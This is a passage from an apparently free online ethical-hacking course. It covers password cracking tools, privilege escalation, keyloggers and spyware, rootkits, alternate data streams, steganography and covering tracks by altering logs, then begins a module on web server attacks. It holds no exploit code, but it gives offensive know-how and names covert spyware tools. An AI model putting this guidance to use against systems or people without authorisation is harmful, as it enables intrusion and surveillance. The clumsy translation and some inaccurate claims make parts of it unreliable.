password by using a key derivation function to generate a key for use with an encryption or other
cryptographic algorithm.

 NTLM v1 vs SAM vs NTLM v2

How to protect our password

Password decryption, also known as password hacking, is the term used to define the process of
obtaining unauthorized use of the network, system or resources that are protected with a
password. The basic way to decrypt passwords is to guess it. Another way is to try several
combinations repeatedly. It is done using a computer algorithm where the computer tests various
combinations of characters until a successful combination occurs. If the password is weak, it can
be easily deciphered. To avoid the risk of deciphering passwords.

There are some recommended practices to protect us from decrypting passwords:

 Do not share your password with anyone, as this allows another person to access your
personal information, such as qualifications and payment statements, information that is
normally restricted to you.
 Do not use the same password during a password change, one that is substantially similar
to the one previously used.
 Enable security auditing to help monitor and track password attacks
 Do not use passwords that can be found in a dictionary
 Do not use simple text protocols (without encryption), or protocols with weak encryption.
 Avoid storing passwords in an unsafe location because passwords that are stored in
places such as in a computer's files are easily subject to attacks.
 Do not use the default passwords of any system.

6 good practices, to protect us from the decryption of passwords:

1. Make passwords difficult to guess using eight to twelve alphanumeric characters in a


combination of uppercase and lowercase letters, numbers and symbols. Secure passwords
are hard to guess. The more complex the password, the less it is subject to attacks.
2. Make sure that applications do not store passwords in memory or write them to disk. If
passwords are stored in memory, passwords can be stolen. Once the password is known,
it is very easy for the attacker to escalate his or her right in the application.
3. Use a random string (salt) as a prefix or suffix with the password before encrypting. This
is used to override precomputing and memorization. Since the salt is usually different for
all people, it is not practical for the attacker to build the tables with a single encrypted
version of each candidate password. UNIX systems generally use 12-bit salt.
4. Never use personal information to design a password, such as birth, spouse, family or pet
names. If you use those passwords, it's easy enough for the people near you to decipher
those passwords.
5. Check server logs for brute force attacks on user accounts. Although brute-force attacks
are difficult to stop, they can be easily detected by monitoring the web server's registry.
6. For each unsuccessful login attempt, an HTTP status code of 401 is recorded in the logs
of your web server. Block an account subject to too many incorrect guesses of password.

Recommended tools, to decrypt passwords


 pwdump7, is an application that downloads password hashes from the SAM database of
NT, pwdump7 extracts hashes of LM and NTLM passwords from local user accounts in
the SAM database. This tool is executed by extracting the binary file SAM and SYSTEM
from the file system and the hashes are extracted. One of the powerful features of
pwdump7 is that it is also capable of downloading protected files.

 fgdump, It is basically a tool to download passwords on Windows


NT/2000/XP/2003/Vista machines. It comes with built-in functionality that has all the
capabilities of PWdump and can also do other crucial things like run a remote executable
file and dump the protected storage on a remote or local host, and capture cached
credentials.

 L0phtCrack, It is a tool designed to audit passwords and recover them. It is used to


recover lost passwords of Microsoft Windows with the help of brute force attacks,
dictionary, hybrid and rainbow table, and is also used to verify the strength of the
password. The security flaws that are inherent in the Windows password authentication
system can be easily revealed with the help of L0phtCrack.

 Ophcrack, is a Windows password cracking tool that uses rainbow tables to decrypt
passwords. It comes with a graphical user interface and runs on different operating
systems, such as Windows, Linux, Unix, etc.

features:

 LM and NTLM hash cracks.


 Brute force module for simple passwords
 Real-time graphics to analyze passwords.
 Hash volumes and loads of SAM encryption recovered from a Windows partition.

 Cain & Abel, It is a password recovery tool. It runs on the Microsoft operating system,
allows you to recover various types of passwords by sniffing the network, decrypting
encrypted passwords using dictionary, brute force and cryptanalysis attacks, recording
VoIP conversations, decoding encrypted passwords and analyzing routing protocols.
With the help of this tool, passwords and credentials from various sources can be easily
recovered.

It consists of APR (ARP Poison Routing) that allows to trace switched LAN and man attacks in
the middle. The sniffer in this tool is also capable of analyzing encrypted protocols such as
HTTP and SSH-1, and contains filters to capture credentials of a wide range of authentication
mechanisms.

Escalation of Privileges
In a privilege escalation attack, the attacker gains access to the networks and their associated data
and applications, taking advantage of defects in the design, the software application, the
misconfigured operating systems, etc.

Once an attacker has gained access to a remote system with a valid username and password, he
will attempt to increase his privileges, such as that of an administrator. Privilege escalation is
required when you want to gain unauthorized access to specific systems. Basically, the escalation
of privileges takes place in two ways, horizontally and vertically.

 Horizontal escalation of privileges: In horizontal escalation of privileges, the


unauthorized user tries to access the resources, functions and other privileges belonging
to the authorized user who has similar access permissions. For example, the user of
online banking A can easily access the bank account of user B.
 Vertical privilege escalation: In the vertical escalation of privileges, the unauthorized
user tries to gain access to the user's resources and functions with higher privileges than
those they possess, such as the application for site administrators.

For example, someone who performs online banking can access the site with administrative
functions. In summary, horizontal escalation seeks to access functions of users similar to it,
vertically seeks to access administrator functions to control the entire system.

Recommended tools

Privilege escalation tools allow you to safely and efficiently remove, restore or bypass Windows,
and can not log on to your computer. With the help of these tools, you can easily access the
blocked computer by resetting the forgotten or blank unknown password. The attacker can use
these tools to retrieve the victim's original passwords. Some privilege escalation tools are listed
as follows:

 Windows Administrator Password Reset


 Trinity Rescue Kit
 Windows Password Recovery Bootdisk

Escalation of Privileges: Countermeasures


The best measure against escalation of privileges is to ensure that users have the least possible
privileges or sufficient privileges to use their system effectively. Often, failures in the
programming code allow such privilege escalation. It is possible for an attacker to gain access to
the network using a non-administrative account. The attacker can get the highest privilege of an
administrator.

General counter-measures of privilege escalation include:

 Restrict interactive sign-in privileges


 Run users and applications with the least privileges
 Implement multi-factor authentication and authorization
 Run services as non-privileged accounts
 Uses the encryption technique to protect confidential data
 Implement a privilege separation methodology to limit the scope of errors and
programming errors
 Reduce the amount of code that runs with particular privileges
 Perform debugging using limit checkers and stress tests
 Test the operating system and errors and coding errors of the application thoroughly
 Update systems regularly

Application Execution
Attackers execute malicious applications at this stage. This is called "owning" the system, the
execution of the applications is done after the attacker obtains the administrative privileges. The
attacker can try to run some of his own malicious programs remotely on the victim's machine to
collect information that leads to the exploitation or loss of privacy, gain unauthorized access to
system resources, decrypt passwords, capture screenshots and install a back door to keep quiet
access, etc.

The malicious programs that the attacker runs on the victim's machine can be:

 Backdoors: programming designed to deny or interrupt operation, collect information


that leads to exploitation or loss of privacy, software that allows remote access to an
attacker without arousing alerts in the system the victim.
 Crackers: piece of software or program designed for the purpose of deciphering the code
or passwords.
 Keyloggers: this can be hardware or a type of software. In any case, the goal is to register
each and every one of the keys made on the computer keyboard.
 Spyware: Spyware can capture screenshots and send them to a specific location defined
by the computer attacker. The attacker must maintain access to the victim's computer
until its purpose is fulfilled. After driving all the required information from the victim's
computer, the attacker installs several back doors to maintain easy access to the victim's
computer in the future.

Recommended tools

 RemoteExec installs applications remotely, executes programs, scripts and updates files
and folders on Windows systems through the network. It allows the attacker to modify
the registry, change local administrator passwords, disable local accounts and copy,
update, delete files and folders.

 PDQ Deploy, is a software deployment tool with which you can easily install almost any
application or patch on your computer. MSI, MSP, MSU, EXE and batch installers can be
deployed remotely on numerous Windows computers at the same time with this tool.
Easy and fast, PDQ Deploy features include integration with Active Directory,
Spiceworks, PDQ Inventory and installations on multiple computers simultaneously, as
well as real-time status, etc.

 Spytech SpyAgent (Keylogger), is a software keylogger that allows you to control the
keystrokes of the user's computer on which it is installed.

 Sound Snooper (Audio Spyware), is a computer espionage software that allows you to
control the sound and voice recorders in the system. In an invisible way it begins to
record once it detects the sound and stops recording automatically when the voice
disappears. You can use this in recording conferences, monitoring of telephone calls,
radios of transmission of records, espionage and supervision of employees, etc. It has
voice-activated recording, can support multiple sound cards, stores records of any sound
format, sends emails with recorded attachments, and is compatible with Windows.

 Phone Spy, is a mobile spyware that helps you monitor and record the activities of a
target mobile phone. You need to install this software on your mobile phone, with the
help of this software you can record activities, logs and GPS locations of the target. To
see the results, you only need to log in to your secure account using any computer or
mobile web browser. The records are displayed by categories and ordered for easy
navigation.

Countermeasures against the execution of Malware

 Installing antivirus and antispyware software, viruses, Trojans and other malware are the
means by which software keyloggers invade the computer. Antivirus and antispyware are
the first line of defense against keyloggers. With the pulse logger cleaning applications
available online, the keyloggers detected by the antivirus can be removed from the
computer.
 Install a host-based IDS, which can monitor your system and disable the installation of
keyloggers.
 Enable firewalls on the computer. Firewalls prevent external access to the computer.
Firewalls prevent the transmission of recorded information to the attacker.
 Keep a record of the programs running on the computer. Use software that scans and
monitors changes frequently in the system or network. Typically, keyloggers tend to run
in the background transparently.
 Keep your hardware systems secure in a locked environment and often check the
keyboard cables for the connected connectors, the USB port.

Rootkits

Rootkits are software programs designed to gain access to a computer without being detected.
These are malicious programs that can be used to gain unauthorized access to a remote system
and perform malicious activities. The goal of the rootkit is to obtain root privileges on a system.
When logging in as a root user of a system, an attacker can perform any task, such as installing
software or deleting files, etc. It works by exploiting vulnerabilities in the operating system and
applications. It builds a backdoor login process for the operating system by which the attacker
can bypass the standard login process. Once root access is enabled, a rootkit can try to hide the
traces of unauthorized access by modifying the drivers or kernel modules and defecting active
processes. Rootkits replace certain calls and utilities of the operating system with their own
modified versions of those routines that, in turn, undermine the security of the target system and
cause the execution of malicious functions. A typical rootkit consists of backdoor programs,
DD0S programs, packet sniffer, registry erasing utilities, IRC bots, etc.

All files contain a set of attributes. There are different fields in the file attributes. The first field is
used to determine the format of the file, that is, if it is a hidden, file or read-only file. The other
field describes the time at which the file was created, when it was accessed, as well as its original
length. The functions GetFileAttributesEx() and GetFilelnformationByHandle() enable it.
ATTRIB.exe is used to display or change file attributes. An attacker can hide, or even change
the attributes of a victim's files, so that the attacker can access them.

Why a Rootkit?

The main purpose of a rootkit is to allow an attacker to repeat unregulated and undetected access
to a compromised system. Installing a backdoor process or replacing one or more of the files that
run the normal connection processes can help meet this goal.

Attackers use rootkits for:

 Root host system and get remote backdoor access


 Hide clues of an attack and presence of malicious applications or processes in the target
system
 Collect confidential data, network traffic, etc. of the system to which the attackers could
be restricted or have no access.
 Store other malicious applications and act as a server resource for bot updates, etc.

Types of Rootkits

A rootkit is a type of malware that can be hidden from the operating system and
antivirus applications on the computer. This program provides attackers with root-level access to
the computer through the back doors. These rootkits employ a variety of techniques to gain
control of a system. The type of rootkit influences the choice of the attack vector. Basically,
there are 6 types of rootkits available.
1. Hypervisor level rootkits are generally created by exploiting hardware features such as
Intel VT and AMD-V. These rootkits host the target operating system as a virtual
machine and intercept all hardware calls made by the target operating system. This type
of rootkit works by modifying the startup sequence of the system and is loaded instead of
the monitor of the original virtual machine.
2. The kernel is the core of the operating system. These cover back doors on the
computer and are created by writing additional code or by replacing parts of the kernel
code with modified code through the device drivers in Windows or the kernel module
loadable in Linux. If the kit code contains errors, the stability of the system is greatly
affected by the kernel-level rootkits. These have the same privileges of the operating
system, therefore, they are difficult to detect and intercept or subvert the operations of the
operating systems.
3. The application level rootkit operates inside the victim's computer replacing the
standard application files with rootkits or modifying the current applications with
patches, injected code, etc.
4. Hardware/firmware rootkits use devices or platform firmware to create a persistent
malware image on the hardware, such as a hard drive, system BIOS, or network card. The
rootkit is hidden in the firmware because the firmware is usually not inspected for the
integrity of the code. A firmware rootkit involves the use of the creation of a rootkit
malware permanent delirium.
5. Boot-loader-level (bootkit) rootkits work either by replacing or modifying the legitimate
boot manager with another. The boot-loader-level (bootkit) can be activated even before
the operating system starts. Therefore, boot-loader-level rootkits (bootkit) are serious
threats to security, as they can be used to steal encryption keys and passwords.
6. Library-level rootkits work higher in the operating system and generally patch, hook or
impersonate system calls with backdoor versions to keep the unknown attacker. They
replace the original system calls with false calls to hide information about the attacker.

How to detect a Rootkit?

Rootkit detection techniques are classified as signature, heuristics, integrity, cross-view based,
and execution path profiles at runtime.

1. Signature-based detection methods function as rootkit fingerprints. You can compare


the byte sequence of a file compared to another sequence of bytes that belong to a
malicious program. This technique is mainly used in system files. Rootkits that are
invisible can be detected easily by scanning the kernel's memory. The success of the
signature-based detection is less due to the tendency of the rootkit to hide files when
interrupting the execution path of the detection software.
2. Heuristic detection works by identifying deviations in the normal patterns or behaviors
of the operating system. This type of detection is also known as behavioral detection. The
heuristic detection is able to identify new previously unidentified rootkits. This ability
lies in being able to recognize the deviant in patterns or behaviors of the system
"normal". The execution path hook is one of those detours that causes heuristic-based
detectors to identify rootkits.
3. Integrity-based detection functions by comparing a current file system, boot logs or
memory snapshots with a known reliable baseline. The evidence or the presence of
malicious activity can be noted by the differences between the current and reference
snapshots.
4. Cross-view-based detection techniques work by assuming that the operating system has
been subverted in some way. This lists the system files, processes, and registry keys by
calling the common APIs. The information collected is then compared with the data set
obtained through the use of an algorithm that traverses the same data. This detection
technique is based on the fact that the API hook or manipulation of the core data structure
contaminates the data returned by the operating system APIs, with the low level
mechanisms used to generate the same information free of DKOM or the handling of
hooks.
5. Run-time execution path profiling technique compares the profile of the execution
path of all system processes and executable files. The rootkit adds a new code near the
routing path of a routine, to destabilize it. The number of instructions executed before and
after a certain routine is engaged and can be significantly different.

Countermeasures against Rootkits

A common feature of these rootkits is that the attacker requires administrator access to the target
system. The initial attack that leads to this access is usually noisy. The excess of network traffic
that arises in front of a new exploit must be monitored. It goes without saying that the analysis of
records is part of risk management. The attacker can have shell scripts or tools that can help him
cover his tracks, but surely there will be other telltale signs that can lead to proactive
countermeasures, not just reactive ones.

A reactive countermeasure is to back up all critical data, excluding binary, and opt for a clean,
new installation from a reliable source. One can do code verification as a good defense against
tools like rootkits. MD5sum.exe can take fingerprints from files and observe integrity violations
when changes occur. To defend against rootkits, integrity checking programs can be used for
critical system files. Numerous tools, programs, software and techniques are available to search
for rootkits.

Some techniques that are adopted to defend against rootkits are listed as follows:

 Reinstall OS or applications from a trusted source after backing up critical data


 Well-documented automated installation procedures must be maintained
 Install firewalls based on host and network
 Use strong authentication
 Store the availability of trusted restoration media
 Harden the workstation or server against attack
 Update patches for operating systems and applications
Countermeasures against Rootkits: recommended programs

McAfee Stinger helps you detect and eliminate the malware, viruses and frequent threats of
Fake Alert identified in your system. Stinger scans the rootkits, the running processes, the loaded
modules, the registry and the directory locations that the malware uses in the machine to
minimize the scanning times. It can also repair the infected files found on your system. Detects
and deactivates all viruses in your system.

UnHackMe It is basically an anti-rootkit software that helps you identify and eliminate all types
of malicious software such as rootkits, trojans, worms, viruses, etc. The main purpose of
UnHackMe is to prevent rootkits from damaging your computer, helping users protect
themselves against masked intrusion and data theft. UnHackMe also includes the Reanimator
feature, which you can use to perform a complete spyware check.

Handling NTFS stream

In addition to the file attributes, each file stored on an NTFS volume generally contains two data
streams. The first data sequence stores the security descriptor and the second stores the data
within a file. Alternative data streams are another type of named data stream that can be present
within each file.

Alternate Data Stream (ADS) is any type of data that can be attached to a file but not in the file
on an NTFS system. The main file table of the partition will contain a list of all the data streams
that a file contains and its physical location on the disk. Therefore, alternative data sequences are
not present in the file, but are associated with it through the file table. NTFS Alternate Data
Stream (ADS) is a hidden sequence of Windows that contains metadata for the file such as
attributes, word count, author name and time to access and modify the files.

ADS is the ability to branch data into existing files without changing or altering their
functionality, size or display to file browsing utilities. ADSs provide attackers with a method to
hide rootkits or hacker tools in a compromised system and allow them to run without being
detected by the system administrator. Files with ADS are impossible to detect using native file
browsing techniques such as the command line or Windows Wxplorer. After attaching an ADS
file to the original file, the size of the file will be displayed as the original size of the file,
regardless of the size of ADS anyfile.exe. The only indication that the file was changed is the
time stamp modification, which can be relatively innocuous.

How to defend against NTFS transmissions


You should use the Lads.exe software as a countermeasure for NTFS. The latest version of
lads.exe gives you a report on the availability status of ADSs. lad.exe is useful for administrators
who work with graphics since this tool provides the results on the screen. This tool searches for
single or multiple sequences. It provides a report of the presence of ADSs, as well as provides
the complete route and length of each ADS that is located.

Other means include copying the cover file into a FAT partition and then moving it back to
NTFS. This corrupts and loses the transmissions.

Recommended tools

1. lns.exe is a tool used to detect NTFS sequences. This tool is useful in a forensic
investigation.
2. Stream Armor, this tool helps you to detect the hidden alternative data stream (ADS) and
eliminate it completely from your system. Your multiprocess ADS scanner helps you
recursively scan the entire system and discover all hidden sequences in your system. It
can easily detect the suspect data sequence of a normal data stream, since it shows the
specific sequence discovered with a specific color pattern. It is also capable of detecting
the file type by using the Advanced File type detection mechanism.

Steganography
It has been argued that one of the shortcomings of several detection programs is their primary
focus in the transmission of text data. ** What happens if an attacker bypasses normal
surveillance techniques and still steals or transmits confidential data? ** A typical situation
would be when an attacker manages to enter a company as a temporary or contracted employee
and surreptitiously searches for confidential information. While the organization may have a
policy of not allowing electronic equipment to be removed from a facility, a particular attacker
can still find ways to use techniques such as steganography.

Steganography is defined as the art of hiding data behind other data without the knowledge of the
enemy. It replaces unused data bits in the usual files (graphics, sound, text, audio, video) with
some other bits that have been obtained surreptitiously. The hidden data can be plain text or
encrypted text, or it can be an image.

The appeal of the steganography technique is that, unlike encryption, steganography can not be
detected. When an encrypted message is transmitted, it is clear that a communication has
occurred, even if the message can not be read. Steganography is used to hide the existence of the
message. An attacker can use it to hide information even when encryption is not a feasible
option. From a security point of view, steganography is used to hide the file in an encrypted
format. This is done so that, even if the file being decrypted is decrypted, the message will
remain hidden.
Attackers can insert information such as:

 Source code for the hacking tool


 List of compromised servers
 Plans for future attacks
 Communication and coordination channel

We will see more about steganography, in the practice of this computer security cursod module.

Cover tracks
The complete work of an attacker involves not only compromising the system successfully but
also disabling the registry, deleting log files, eliminating evidence, planning additional tools and
covering their tracks. The attacker must erase the evidence of "having been there and having
done the damage". Deleting intrusion logs, tracking files and attack processes is very important
for an attacker, since messages can alert the real owner of the system to change security settings
and thus prevent attacks in the future. If this happens, then the attacker will not have more
chances to rejoin the system to launch the attack. Therefore, an attacker needs to destroy the
evidence of intrusion to maintain access and evasion. If the attacker covers or removes their
clues, then he or she can log back into the system and install backdoors. Therefore, the attacker
can obtain sensitive information from users, such as user name and bank account passwords,
email ID, etc.

It is possible that the attacker does not want to delete a complete record to cover his tracks, as it
may require administrator privileges. If the attacker can delete only the attack event logs, even
then the attacker hides from being detected.

The elimination of evidence or tracks is a requirement for any attacker who wishes to remain
hidden. This is a method to evade tracking. This starts with the deletion of the contaminated
logins and the possible error messages that may have been generated from the attack process.
Next, attention will be paid to changes so that future session starts are not allowed. By
manipulating and modifying the event logs, the system administrator can be convinced that the
output of their system is correct and that intrusion or compromise has not occurred.

Since the first thing that a system administrator does to control unusual activity is to check the
system's log files, it is common for intruders to use a utility to modify system logs. In some
cases, rootkits can disable and discard all existing records. This happens if the intruders intend to
use the system for a longer period of time as a launching base for future intrusions, if they
remove only those parts of the records that may reveal their presence with the attack.

It is imperative that the attackers make the system look like it did before they gained access and
set up back doors for their use. All files that have been modified must be changed to their
original attributes. There are tools to cover the clues regarding the NT operating system. The
information listed, such as the file size and date, is only attribute information included in the file.
Protecting yourself against an attacker who is trying to cover your tracks by changing the file
information can be difficult. However, it is possible to detect if an attacker has changed the file
information by calculating a cryptographic hash in the file. This type of hash is a calculation that
is made against the entire file and then encrypted.

Tools: Auditpol

One of the first steps for an attacker with command line capability is to determine the auditing
status of the target system, locate confidential files (such as password files), and implement
automatic information gathering tools (such as a keystroke logger). or a network tracker).

Windows audit records certain events in the Event Log (or associated syslog). The registration
can be configured to send alerts (email, pager, etc.) to the system administrator. Therefore, the
attacker will want to know the audit status of the system he is trying to compromise before
continuing with his plans. The ** Auditpol.exe ** tool is part of the NT resource kit and can be
used as a simple command-line tool to find out the auditing status of the target system and also to
make changes to it.

The attack on systems in the Pentesting


In an attempt to hack a system, the attacker initially tries to decrypt the system password, if
applicable. Therefore, as a pentester, you should also try to decrypt the system password.

1. Identify password protected systems: identify the target system whose security needs to
be evaluated. Once you identify the system, check if you have access to the password,
that is, a stored password. If the password is not stored, try several password cracking
attacks one after the other on the target system.
2. Once the attacker obtains the system password, he or she tries to escalate their privileges
at the administrator level so that they can install malicious programs or malware on the
target system and thus retrieve confidential information from the system. As a pentester,
you must hack the system as a normal user and then try to escalate your privileges.
3. Pentesters should verify the target systems by running some applications to discover the
gaps in the target system.
4. An attacker installs the rootkits to keep the access hidden from the system. You must
follow the steps of the pentesting to detect hidden files in the target system
5. The pentester must know if he or she can cover the clues he or she has made during the
simulation of the attack to perform penetration tests.

This module ends here, I hope you have been able to learn the objectives of this module. This
course has an effort and it is free, I would like you to share it in your social networks or hacking
forums so that more people can see it, this course will advance to reach several modules, you can
subscribe if you want to know the progress of the course

en.gburu.net
 Home
 Courses
 FREE $10 in DigitalOcean
 about
 contact
 gburu.net

Subscribe
9 April 2018

Free Ethical Hacking Course - Module 6 -


Hacking Webservers
Ethical Hacking Course, Computer Security

Full course: en.gburu.net/hack, here you will find all the topics of this free ethical hacking
course, in one place.

Responsibility:
This ethical hacking course is aimed at educational purposes to improve your computer security
skills to plan and design safer networks, does not encourage illegal activities in systems or
networks of third parties, if you commit an illicit activity in a system or network. You will do at
your own risk. If you want to practice and improve your skills in ethical hacking, do it under
systems where you have a legal permit or are yours, I recommend using images of operating
systems installed in virtual machines in a controlled environment.

Agenda: Module 6 - Hacking Webservers

 Objectives of module 6
 What is a Server?
o How does a Web Server work?
o Client-server model
o Roles: in the client-server model
o Protocol: HTTP
 HTTP: methods
o Most popular web servers
 Why is a web server at risk?
o Perspectives of the developer, network administrator and end user
o Common causes that facilitate attacks on Servers
 What impact does the server receive after an attack?
 Website defacement
 Default configuration, in web servers
 Cross directory attacks (directory traversal)
 HTTP response split attack
 Web cache poisoning attack
 HTTP response hijacking
 Brute force against SSH
 Attack: Man in the middle
 Deciphering passwords
o Web server password decryption techniques
 Attacks against web applications
 Methodology of attack against a Server
o Gather information
o Get information about services
o Vulnerability scan
o Session hijacking
 Countermeasures to protect a Web Server
o Countermeasures: Update and security patches
o Countermeasures: Protocols and services
o Countermeasures: Files and server directories
o How to defend against web server attacks
o Good practices recommended
 Patch Management
o What is Patch Management?
o Patch management: recommended tools
 Pentesting: server hacking

Objectives of Module 6
Often, a breach in security causes more harm in terms of goodwill, that is, you lose your
customers' loyalty by knowing that you can not protect the information they host on your
server than in the actual quantifiable loss, this makes the security of the web server critical for
the normal functioning of a company, or at least we all want to believe that the companies that
are in charge of the applications we use in our day to day are worried about our information and
invest in security...

Most companies consider that their web presence is an extension of themselves, this module tries
to highlight the various security concerns in the context of web servers, in this module you can
understand what a web server is and its architecture, types of attacks that are often used by
computer criminals, most commonly used tools, etc. It is good to mention that the hacking of
web servers is a very broad topic and this module tries to give you a general introduction, I
recommend you to continue investigating on your own after seeing this module to increase your
knowledge in server hacking.

overview of what we will see in this sixth module of the free computer security course:

 What is a Web Server, and how does it work?


 Why are you looking to attack Servers?
 Impacts of attacks against Servers
 Attacks against Web Servers
 Methodology for attacks against Servers
 Tools that are usually used
 Countermeasures, and how to defend ourselves
 Patch management and tools to automate the system update
 The hacking of servers in the Pentesting

What is a Server?
A server is like the computers we use on a daily basis, in other words it is still a commonly used
computer. It has some differences that I will try to explain in a simple way since this course does
not deal with server hardware. Well, let's see the differences that a server of our computer has.

A server is always in a rack, located inside a data center, the rack is like a cabinet or closet but
very high in it you can host several servers, let's see how it is:

We usually have the computer in a cabinet, but the server looks different, for example, this Dell
brand server:

As we can see, it does not look like the cabinet we usually see, but inside it still has the same
components as a computer, although of course they are high performance.

In addition to the above, the servers are managed remotely ie they are adapted to be controlled
from anywhere in the world through the terminal or command console, generally in our
computer we have a graphical interface, this does not happen when we are inside a server , since
in most cases we connect via SSH and execute command commands so that the server reacts and
does what we ask, either to execute a simple task until deploying a web application.

As we can see in the image, a data center is a building where all the racks that contain servers are
located, also the data centers are known as "server farms".

What is a Web Server, and how does it work?

Now that we understand what a server is, understanding that it is a web server will be easier.

Well let's take the example of the Dell server that we saw in the image above, now we are going
to install an operating system (Linux or Windows), then we will install a software (Nginx,
Apache, IIS, etc) that is responsible for receiving requests (GET, POST, etc), processing them
and then returning responses either: information from a database, an HTTP error code (404, 500,
etc) or files As for example: HTML, CSS, JS, PHP, .NET, JSP, ASP, MP3, JPG, PNG, MP4,
PDF, etc. Ready we have a web server, now let's dig a little deeper.

Therefore, a web server is a program that can be installed in an operating system and run in the
port you want, by default they usually run on port 80 or 8080, can make connections
bidirectional ie send and receives information at the same time and unidirectional connections
** sends a response to a single point. All the information sent by the server is rendered by a web
browser (software) and then transmitted visually to the client, either by HTTP or HTTPS.

Client-server model

The web server is the intermediate layer between the client language and the server language, ie
a web application is composed of a back-end in it we will find a programming language that can
be PHP, NodeJS (Javascript ), .NET, JSP (Java), Ruby, etc. The "back-end language" is
responsible for receiving requests processed by the server and taking actions depending on the
logic of the business can consult a database (MySQL, PostgreSQL, Redis, etc) and return an
answer that the server process and send it to the client, this client is located in the front-end that
this layer is usually composed of HTML, JS, CSS and multimedia files.

Roles: in the client-server model

 The client: is the sender of a request (request), therefore its role in the communication is
active, it can send requests to several servers at the same time and wait for their answers,
this process is always done with a graphic interface (web browser). For example: we
open our browser, enter gburu.net and facebook.com, we make 2 requests simultaneously
and we wait for the response of 2 different servers.
 The server: is the receiver of the requests made by a client, therefore its role is passive
since at the beginning it is waiting to receive requests in the port you want, it processes
all the requests and can communicate with the programming languages and then return a
response (response) to the client, can receive and process many requests at the same time
depending on the hardware that was granted, a web server can be used locally for testing
and production as it is compatible with the scalability of resources.

Protocol: HTTP

There are many ways to use a server can be for email, storage of files, dedicated to databases,
etc. In this module of computer security course we will focus on web-oriented servers, so let's
talk a little about HTTP.

HTTP is a transaction-oriented protocol and follows the request-response scheme between a


client and a server. The client (usually called "user agent" in English "user agent") makes a
request by sending a message, with a certain format to the server. The server (usually called a
web server) sends a reply message. Examples of clients are web browsers and web spiders (also
known by their English term, webcrawlers).

Every website that we visit from an HTTP browser is involved, for example let's look at the
client-server pattern from the HTTP perspective, when we visit https://gburu.net

 General:

We can see that a request is made to https://gburu.net using the GET method and then we
receive a code 200 that tells us that the requested resource is available

In the answer we can see in "content-type" that the server returned an HTML file with
the UTF-8 character format, in our request we see the 'user-agent' the content that we
accept receive, the method and then the route.

HTTP: methods

HTTP is a protocol that handles several verbs (methods) for requests.

 GET: is the most common, it is activated by default when we enter any URL, all the
information that we pass to the GET will be visible by anyone that means that the method
accepts "parameters", for example: when we are on page 2 of a web we usually see
"/index.php?page=2" this tells us that the parameter is "page" and the value is "2" , its
function is to return page number 2, just look at the URL to find out what information we
passed to GET, so this method is recommended for: searches, filters, order content and
paging.
 POST: this method is the 2nd most common when it comes to HTTP, it fulfills the
function of carrying sensitive information to the server so that it is then executed in the
back-end language, a normal use is in forms of income, registration or contact, since it
encodes the information and does not show it in the URL as GET does, another important
point is that POST is added the ability to support cookies which is good for remembering
users who logged in, and store information on the same in the browser for later use,
however it is recommended to use POST in destruction operations (add, edit, delete) on
resources, for more security it is advisable to use POST with HTTPS.
 PUT: it is usually the most optimal to deal with file uploads to a web server, for example
POST has to use a multipart message to encode the resource (file) to upload on the server
side it has to be decoded . Example of an HTML form to upload file in POST:

<form action="/upload.php" method="POST" enctype="multipart/form-


data"></form>

On the contrary PUT makes a direct socket connection with the server to send the file, therefore
it makes it more optimal but you have to have full control of the server as a VPS since in some
shared hosting the PUT method is not allowed.
To be taken into account: All modern browsers and new HTML standards only officially
support the GET and POST methods in the forms, in order to use PUT, it is enough to create a
POST form and then add a field hidden with the following parameters and values: (name
_method, value="PUT"), it looks like this:

<form action="/upload.php" method="POST" enctype="multipart/form-data">


<input type="hidden" name="_METHOD" value="PUT"/>
</form>

 PATCH: has the same function as PUT, but is used to update resources.
 DELETE: destroy or delete resources from a web application
 TRACE: this method is intended for debugging, so being enabled allows a client to
obtain information from the server and if there are intermediate servers, it is usually
disabled to not provide information that serves an offender computer
 OPTIONS: Returns the HTTP methods that the server supports for a specific URL. This
can be used to check the functionality of a web server by request instead of a specific
resource.
 CONNECT: Used to know if you have access to a host, not necessarily the request
reaches the server, this method is mainly used to know if a proxy gives us access to a host
under special conditions, such as "streams" of encrypted bidirectional data (as required by
SSL).

Most popular Web Servers

There are many softwares to fulfill the routine tasks of a web server, but there is a market behind
them and consumers usually choose 3 softwares:

En el last report (Abril 2018) from w3techs, we see that the web server that has the most market
share is Apache, follow him Nginx and third is Microsoft IIS, then we see that this LiteSpeed
WebServer.

Why is a web server at risk?

There are different types of security risks associated with web servers, local area networks that
host websites and users accessing these websites through browsers, employees, the application
market, competition, organized cybercrime, etc.

 Developer Perspective: From the perspective of a developer or web developer, the


greatest security concern is that the web server can expose the local area network (LAN)
or corporate intranet to the threats posed by the Internet. This can be in the form of
viruses, Trojans, attackers or the commitment of the information itself. Software errors
present in large complex programs are often considered the source of impending security
lapses. However, web servers that are large and complex devices also come with these
inherent risks. In addition, the open architecture of web servers allows arbitrary scripts to
be executed on the server while remote requests are being answered. Any CGI script
installed on the site may contain errors that are security holes in the future.
 Network administrator's perspective: from a network administrator's perspective, a
configured web server presents another potential hole in the security of the local network.
While the goal of a website is to provide controlled access to the network, excessive
control can make a website almost impossible to use. In an intranet environment, the
network administrator must be careful with the configuration of the web server, so that
legitimate users are recognized and authenticated, and several user groups are assigned
different access privileges.
 Perspective of the end user (client): generally the end user does not perceive any
immediate threat, since surfing the web seems safe and anonymous, in addition most do
not have technical or programming knowledge therefore it is very difficult that is aware
of a computer attack, anyway if I had that knowledge, it is difficult to know that an
external server is suffering a computer attack. In this way, the active content such as
malicious javascript codes, product of an attack on the website that the user visits, makes
it possible for harmful applications, such as viruses, to invade the user's system. In
addition, the active content of a website's browser can be a conduit for malicious software
to bypass the firewall system and permeate the user's local area network. Not only that,
an attack on a web server can give the attacker direct access to the database that stores
sensitive information about the client of the application, without it being aware of it.

Common causes that facilitate attacks on Servers

Most server-oriented computer attacks are caused by the causes that we will see below:

 Server installation with the default configuration: unnecessary files that come by
default in an installation, test files, default configuration for users and their respective
passwords.
 Incorrect file and directory permissions: this is a poor access control policy for internal
employees, to give it ease it avoids rigorous controls, therefore there are no clear limits
on issues of permissions and access to sensitive information .
 Software patches are not applied: lack of adequate security policies, procedures and
maintenance of the entire infrastructure. Therefore, the exposed software with a
vulnerability does not apply the patch to solve the vulnerability.
 Bad reputation in certificates: this is because self-signed certificates are used and not
by a trusted authority, incorrect authentication with external systems.
 Lack of hardening in the infrastructure: this means that an internal audit is not applied
to the system and services that are not used are left in operation and give the attacker
more chance to find access points, for example: use SSH for remote administration and
